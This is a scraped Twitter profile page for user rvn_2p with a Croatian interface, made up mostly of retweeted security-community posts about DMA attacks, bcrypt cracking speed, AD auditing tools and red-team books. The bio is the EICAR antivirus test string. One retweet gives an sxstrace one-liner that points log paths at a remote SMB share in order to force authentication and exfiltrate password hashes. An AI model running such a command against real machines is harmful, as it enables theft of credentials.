Twitter | Pretraživanje | |
rvn_2p
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
1.550
Tweetovi
182
Pratim
33
Osobe koje vas prate
Tweetovi
rvn_2p 22 min
Odgovor korisniku/ci @Schmidtlepp
aberaberaber der Linksextremismus
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
majek04 4. velj
It's possible to hack a machine with DMA attacks - you need to be able to hot-plug PCI or firewire device. IOMMU was said to be a decent solution to the problem. But nope. It turns out IOMMU can be still broken because... computers are hard.
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Gergely Revay 4. velj
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Vincent Le Toux (Paris) 2. velj
2.8.0.0 released !!! 4 clicks and 2 <enter>, that what's between you and the hard truth of your AD security. Example of report: github: Changelog:
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
owen white 31. sij
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Simon Weckert 1. velj
99 smartphones are transported in a handcart to generate virtual traffic jam in Google Maps. Through this activity, it is possible to turn a green street red which has an impact in the physical world by navigating cars on another route!
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Catalin Cimpanu 31. sij
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
hashcat 1. velj
For those of you using a NV GPU with Volta or Turing chipset, listen up! We hacked our way into the post-48k GPU shared memory region. This improved bcrypt cracking performance by an average of 25%. For instance a GTX2080Ti improved from 42116 H/s to 54770 H/s
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
v∅id natalie() 29. sij
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
winnie 30. sij
Uploaded my slides from "Attacking Jenkins" talk at : , blogpost will follow during the next days.
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Silvio Cesare 30. sij
Train with me and to find bugs and vulnerabilities in C systems software
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Richard Gold 28. sij
1. Windows Defender 2. EDR 3. Automated defanging of documents 4. Disabling macros, OLE, DDE, etc. 5. Disabling Windows Script Hosting 6. Private VLANs 7. Application whitelisting 8. Users not being local admins 9. 2FA on everything 10. Up-to-date patching
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Jon Barber 28. sij
I'm looking for a new role doing something AppSec/Red Team/OSINT related in Seattle or remote. My strong suite is web and mobile security, with lots of bug bounty experience. My resume and contact info are on , DMs open as well. RT's are much appreciated.
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Matty Mariansky 28. sij
Odgovor korisniku/ci @hondanhon
why our office is switching to Fortnite
Reply Retweet Označi sa "sviđa mi se"
rvn_2p 29. sij
Odgovor korisniku/ci @Schmidtlepp
Christopher Lobo verfolgt mich in meinen Träumen. Alles sagen er kann mir nicht weh tun.
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Kevin Beaumont 27. sij
Big change coming to Windows Server this March - insecure LDAP requests will be rejected by default. That's a change in behaviour which will absolutely break things in some orgs How to get in front of the issue:
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
kmkz 24. sij
A new way to exfiltrate hash by forcing auth ? Check this : sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a   cc
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
RetroGames e. V. 25. sij
Ebenfalls neu in der Ausstellung.
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Yarden Shafir 16. sij
After a lot of work and some crypto-related delays, I couldn't be more proud to publish 's and mine latest research - The complete overview of CET internals on Windows (so far!):
Reply Retweet Označi sa "sviđa mi se"
rvn_2p proslijedio/la je tweet
Joe Vest 21. sij
We released a Red Teaming book! Red Team Development and Operations. It's been a crazy project that has existed in many forms. It started as simple notes, came together as a SANS class, and will now live as a book. Read about it here.
Reply Retweet Označi sa "sviđa mi se"